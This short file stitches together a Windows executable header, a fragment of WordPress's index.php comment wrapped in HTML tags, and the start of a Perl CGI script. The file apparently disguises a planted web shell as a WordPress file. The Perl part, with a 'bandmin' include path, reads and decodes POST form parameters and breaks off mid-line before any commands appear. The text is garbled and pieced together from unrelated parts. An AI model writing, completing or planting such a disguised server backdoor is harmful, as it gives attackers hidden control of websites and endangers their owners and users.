﻿MZ       ÿÿ  ¸       @                                   È   º ´	Í!¸LÍ!This program cannot be run in DOS mode.

<html>/**
 * Front to the WordPress application. This file doesn't do anything, but loads</html>
#!/usr/bin/perl   -I/usr/local/bandmin
use MIME::Base64;print "Content-type: text/html\n\n";if($ENV{'REQUEST_METHOD'} eq "POST"){my ($i, $key, $val, $in);read(STDIN, $in, $ENV{'CONTENT_LENGTH'});@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i], 2);$key =~ s/%(..)